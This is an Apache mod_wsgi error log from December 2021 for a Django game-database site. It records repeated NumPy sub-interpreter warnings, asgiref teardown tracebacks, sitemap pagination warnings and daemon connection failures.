[Mon Dec 06 04:50:04.790011 2021] [wsgi:error] [pid 4301:tid 140024314029824] (2)No such file or directory: [client 118.241.180.75:50567] mod_wsgi (pid=4301): Unable to connect to WSGI daemon process 'django_jtos' on '/var/run/apache2/wsgi.826.1.4.sock' as user with uid=33., referer: https://jtos.tavernofsoul.com/planner/
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Dec 06 04:50:10.539734 2021] [wsgi:error] [pid 6925:tid 140024507725568] [remote 185.191.171.2:25436] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 04:50:10.539785 2021] [wsgi:error] [pid 6925:tid 140024507725568] [remote 185.191.171.2:25436] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 04:50:10.539791 2021] [wsgi:error] [pid 6925:tid 140024507725568] [remote 185.191.171.2:25436]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Dec 06 04:51:14.270106 2021] [wsgi:error] [pid 6934:tid 140024330815232] (2)No such file or directory: [client 27.138.98.98:57316] mod_wsgi (pid=6934): Unable to connect to WSGI daemon process 'django_jtos' on '/var/run/apache2/wsgi.826.2.4.sock' as user with uid=33., referer: https://jtos.tavernofsoul.com/?q=%E3%82%B6%E3%82%A4%E3%83%90%E3%82%B9
[Mon Dec 06 04:51:16.579977 2021] [wsgi:error] [pid 7245:tid 140024507725568] [remote 27.138.98.98:57319] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 04:51:16.580026 2021] [wsgi:error] [pid 7245:tid 140024507725568] [remote 27.138.98.98:57319] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 04:51:16.580031 2021] [wsgi:error] [pid 7245:tid 140024507725568] [remote 27.138.98.98:57319]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Dec 06 06:59:16.268899 2021] [wsgi:error] [pid 9337:tid 140024415405824] [remote 54.36.148.2:44775] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 06:59:16.268950 2021] [wsgi:error] [pid 9337:tid 140024415405824] [remote 54.36.148.2:44775] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 06:59:16.268954 2021] [wsgi:error] [pid 9337:tid 140024415405824] [remote 54.36.148.2:44775]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Dec 06 07:07:25.525067 2021] [wsgi:error] [pid 9985:tid 140024507725568] [remote 54.36.149.0:40739] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 07:07:25.525124 2021] [wsgi:error] [pid 9985:tid 140024507725568] [remote 54.36.149.0:40739] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 07:07:25.525130 2021] [wsgi:error] [pid 9985:tid 140024507725568] [remote 54.36.149.0:40739]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Dec 06 07:13:06.355843 2021] [wsgi:error] [pid 10368:tid 140024507725568] [remote 216.244.66.239:37678] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 07:13:06.355900 2021] [wsgi:error] [pid 10368:tid 140024507725568] [remote 216.244.66.239:37678] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 07:13:06.355928 2021] [wsgi:error] [pid 10368:tid 140024507725568] [remote 216.244.66.239:37678]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Dec 06 07:16:35.108234 2021] [wsgi:error] [pid 10764:tid 140024499332864] [remote 185.191.171.5:48246] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 07:16:35.108293 2021] [wsgi:error] [pid 10764:tid 140024499332864] [remote 185.191.171.5:48246] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 07:16:35.108299 2021] [wsgi:error] [pid 10764:tid 140024499332864] [remote 185.191.171.5:48246]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Dec 06 07:17:35.690304 2021] [wsgi:error] [pid 11127:tid 140024507725568] [remote 54.36.148.9:41737] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 07:17:35.690364 2021] [wsgi:error] [pid 11127:tid 140024507725568] [remote 54.36.148.9:41737] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 07:17:35.690370 2021] [wsgi:error] [pid 11127:tid 140024507725568] [remote 54.36.148.9:41737]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Dec 06 07:43:40.580969 2021] [wsgi:error] [pid 11947:tid 140024507725568] [remote 54.36.149.85:44347] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 07:43:40.581029 2021] [wsgi:error] [pid 11947:tid 140024507725568] [remote 54.36.149.85:44347] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 07:43:40.581035 2021] [wsgi:error] [pid 11947:tid 140024507725568] [remote 54.36.149.85:44347]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Dec 06 08:36:50.280441 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 54.36.148.149:60325] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 08:36:50.280508 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 54.36.148.149:60325] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 08:36:50.280514 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 54.36.148.149:60325]   __import__(dependency)
[Mon Dec 06 17:34:32.438855 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Mon Dec 06 17:34:32.439550 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500]   return paginator.Paginator(self._items(), self.limit)
[Mon Dec 06 17:34:32.633611 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Mon Dec 06 17:34:32.633664 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500]   return paginator.Paginator(self._items(), self.limit)
[Mon Dec 06 17:34:32.974502 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Mon Dec 06 17:34:32.974567 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500]   return paginator.Paginator(self._items(), self.limit)
[Mon Dec 06 17:34:36.486880 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Mon Dec 06 17:34:36.486937 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500]   return paginator.Paginator(self._items(), self.limit)
[Mon Dec 06 17:34:36.525705 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Mon Dec 06 17:34:36.525754 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500]   return paginator.Paginator(self._items(), self.limit)
[Mon Dec 06 17:34:36.608421 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Mon Dec 06 17:34:36.608491 2021] [wsgi:error] [pid 12942:tid 140024482547456] [remote 66.249.73.238:48500]   return paginator.Paginator(self._items(), self.limit)
[Tue Dec 07 00:00:06.407497 2021] [wsgi:error] [pid 12951:tid 140024339207936] [client 206.189.33.118:34654] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Tue Dec 07 00:01:24.352553 2021] [wsgi:error] [pid 25925:tid 140024507725568] [remote 54.36.148.145:22657] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Tue Dec 07 00:01:24.352604 2021] [wsgi:error] [pid 25925:tid 140024507725568] [remote 54.36.148.145:22657] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Tue Dec 07 00:01:24.352609 2021] [wsgi:error] [pid 25925:tid 140024507725568] [remote 54.36.148.145:22657]   __import__(dependency)
[Wed Dec 08 00:00:07.242380 2021] [wsgi:error] [pid 25992:tid 140024280459008] [client 206.189.33.118:57958] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Wed Dec 08 00:00:22.735347 2021] [wsgi:error] [pid 47512:tid 140024507725568] [remote 207.46.13.213:61568] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 08 00:00:22.735388 2021] [wsgi:error] [pid 47512:tid 140024507725568] [remote 207.46.13.213:61568] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 08 00:00:22.735392 2021] [wsgi:error] [pid 47512:tid 140024507725568] [remote 207.46.13.213:61568]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 08 02:35:43.898915 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 54.36.148.124:45505] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 08 02:35:43.898964 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 54.36.148.124:45505] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 08 02:35:43.898968 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 54.36.148.124:45505]   __import__(dependency)
[Wed Dec 08 06:26:29.969190 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Wed Dec 08 06:26:29.970223 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550]   return paginator.Paginator(self._items(), self.limit)
[Wed Dec 08 06:26:30.171869 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Wed Dec 08 06:26:30.171924 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550]   return paginator.Paginator(self._items(), self.limit)
[Wed Dec 08 06:26:30.508068 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Wed Dec 08 06:26:30.508123 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550]   return paginator.Paginator(self._items(), self.limit)
[Wed Dec 08 06:26:33.675920 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Wed Dec 08 06:26:33.675973 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550]   return paginator.Paginator(self._items(), self.limit)
[Wed Dec 08 06:26:33.715125 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Wed Dec 08 06:26:33.715176 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550]   return paginator.Paginator(self._items(), self.limit)
[Wed Dec 08 06:26:33.794920 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Wed Dec 08 06:26:33.794967 2021] [wsgi:error] [pid 51240:tid 140024507725568] [remote 66.249.75.21:57550]   return paginator.Paginator(self._items(), self.limit)
Exception ignored in: <function Local.__del__ at 0x7f59f738bc10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Thu Dec 09 00:00:16.033582 2021] [wsgi:error] [pid 74971:tid 140024390227712] [remote 54.36.148.81:40289] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Thu Dec 09 00:00:16.033632 2021] [wsgi:error] [pid 74971:tid 140024390227712] [remote 54.36.148.81:40289] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Thu Dec 09 00:00:16.033636 2021] [wsgi:error] [pid 74971:tid 140024390227712] [remote 54.36.148.81:40289]   __import__(dependency)
[Thu Dec 09 15:08:57.769227 2021] [wsgi:error] [pid 74981:tid 140024516118272] (70007)The timeout specified has expired: [client 124.144.43.244:11244] mod_wsgi (pid=74981): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
[Fri Dec 10 00:00:07.154349 2021] [wsgi:error] [pid 74981:tid 140024381171456] [client 206.189.33.118:52346] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Fri Dec 10 00:00:17.529886 2021] [wsgi:error] [pid 269414:tid 140024507725568] [remote 185.191.171.9:16244] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 00:00:17.529935 2021] [wsgi:error] [pid 269414:tid 140024507725568] [remote 185.191.171.9:16244] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 00:00:17.529940 2021] [wsgi:error] [pid 269414:tid 140024507725568] [remote 185.191.171.9:16244]   __import__(dependency)
[Fri Dec 10 02:04:25.529319 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Fri Dec 10 02:04:25.532778 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 10 02:04:25.725693 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Fri Dec 10 02:04:25.725746 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 10 02:04:26.138804 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Fri Dec 10 02:04:26.138874 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 10 02:04:29.215315 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Fri Dec 10 02:04:29.215376 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 10 02:04:29.253518 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Fri Dec 10 02:04:29.253572 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 10 02:04:29.340772 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Fri Dec 10 02:04:29.340855 2021] [wsgi:error] [pid 269414:tid 140024398620416] [remote 66.249.79.71:49295]   return paginator.Paginator(self._items(), self.limit)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 10 02:21:09.485909 2021] [wsgi:error] [pid 272262:tid 140024507725568] [remote 207.46.13.109:1408] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 02:21:09.485951 2021] [wsgi:error] [pid 272262:tid 140024507725568] [remote 207.46.13.109:1408] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 02:21:09.485955 2021] [wsgi:error] [pid 272262:tid 140024507725568] [remote 207.46.13.109:1408]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 10 02:35:07.951289 2021] [wsgi:error] [pid 273218:tid 140024398620416] [remote 54.36.149.23:47553] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 02:35:07.951350 2021] [wsgi:error] [pid 273218:tid 140024398620416] [remote 54.36.149.23:47553] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 02:35:07.951357 2021] [wsgi:error] [pid 273218:tid 140024398620416] [remote 54.36.149.23:47553]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 10 02:36:44.708032 2021] [wsgi:error] [pid 273556:tid 140024507725568] [remote 185.191.171.4:48234] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 02:36:44.708080 2021] [wsgi:error] [pid 273556:tid 140024507725568] [remote 185.191.171.4:48234] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 02:36:44.708085 2021] [wsgi:error] [pid 273556:tid 140024507725568] [remote 185.191.171.4:48234]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 10 02:42:57.356031 2021] [wsgi:error] [pid 274256:tid 140024507725568] [remote 185.191.171.6:35496] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 02:42:57.356083 2021] [wsgi:error] [pid 274256:tid 140024507725568] [remote 185.191.171.6:35496] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 02:42:57.356088 2021] [wsgi:error] [pid 274256:tid 140024507725568] [remote 185.191.171.6:35496]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
